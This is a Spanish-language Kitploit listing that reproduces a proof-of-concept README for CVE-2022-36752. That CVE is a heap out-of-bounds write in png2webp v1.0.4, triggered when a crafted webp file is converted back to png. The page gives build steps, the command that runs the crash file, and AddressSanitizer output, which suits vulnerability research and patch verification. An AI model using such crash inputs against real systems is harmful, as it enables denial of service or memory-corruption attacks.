Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-36752 — Prueba de concepto para CVE-2022-36752 | Kitploit
Herramientas/GitHubGitHub/halcy0nic/cve-2022-36752
Análisis de VulnerabilidadesExplotaciónFuzzingAnálisis de BinariosPapers e InvestigaciónAprendizaje y Educación
GitHubhalcy0nic/cve-2022-36752

CVE-2022-36752

Prueba de concepto para CVE-2022-36752

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción para CVE-2022-36752

Se descubrió que png2webp v1.0.4 contiene una escritura fuera de los límites a través de la función w2p. Esta vulnerabilidad es explotable mediante un archivo webp manipulado al revertir el formato a png.

Reproducción

Para reproducir la vulnerabilidad, descargue la versión vulnerable de png2webp (v1.0.4) y compile el proyecto:

root@kitploit:~
git clone https://github.com/landfillbaby/png2webp.git
cd png2webp
git checkout 0c7119109cde91127a263bf0af252e5e730f7fba
git submodule update --init --depth 1
./configure && make

Una vez compilado el proyecto, podemos apuntar png2webp hacia nuestro archivo .webp malicioso incluido en este repositorio (CVE-2022-36752_crash.webp):

root@kitploit:~
./png2web -r CVE-2022-36752_crash.webp

El comando anterior provocará un fallo y devolverá un mensaje de error:

root@kitploit:~
corrupted size vs. prev_size

Para comprender mejor dónde se produce el fallo, recompilemos el proyecto con AddressSanitizer (ASAN) añadiendo -fsanitize=address a la variable CFLAGS en el Makefile. También queremos que el compilador almacene información de la tabla de símbolos en el ejecutable (indicador -g) para ayudarnos a determinar qué línea de código provocó el fallo:

root@kitploit:~
ifeq (${uname_m},x86_64)
CFLAGS ?= -O3 -Wall -Wextra -pipe -flto=auto -DNDEBUG -march=x86-64-v2 -fsanitize=address -g

A continuación, limpiaremos los archivos obsoletos y recompilaremos el proyecto:

root@kitploit:~
make clean
make

ASAN informa de una escritura no válida de tamaño 12 en el programa, lo que confirma la existencia de una vulnerabilidad de escritura fuera de los límites:

root@kitploit:~
==222970==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x563e3ec4ee6a bp 0x7fff3a7b04d0 sp 0x7fff3a7b04c8
WRITE of size 12 at 0x602000000010 thread T0
    #0 0x563e3ec4ee69  (/dev/shm/png2webp/png2webp+0x23e69)
    #1 0x563e3ec3df34  (/dev/shm/png2webp/png2webp+0x12f34)
    #2 0x7fcfe4967189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #3 0x7fcfe4967244 in __libc_start_main_impl ../csu/libc-start.c:381
    #4 0x563e3ec3e3f0  (/dev/shm/png2webp/png2webp+0x133f0)

0x602000000017 is located 0 bytes to the right of 7-byte region [0x602000000010,0x602000000017)
allocated by thread T0 here:
    #0 0x7fcfe4cae7cf in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x563e3ec46052  (/dev/shm/png2webp/png2webp+0x1b052)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/dev/shm/png2webp/png2webp+0x23e69) 
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[07]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==222970==ABORTING

Código vulnerable en la función w2p():

root@kitploit:~
  if(l < 12
#ifdef SSIZE_MAX
    || l - 12 > SSIZE_MAX
#endif
  ) {
    PF("ERROR reading %s: %s", IP, k[2]);
    goto w2p_close;
  }

Referencias

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36752
  • https://cwe.mitre.org/data/definitions/787.html
Descargar herramienta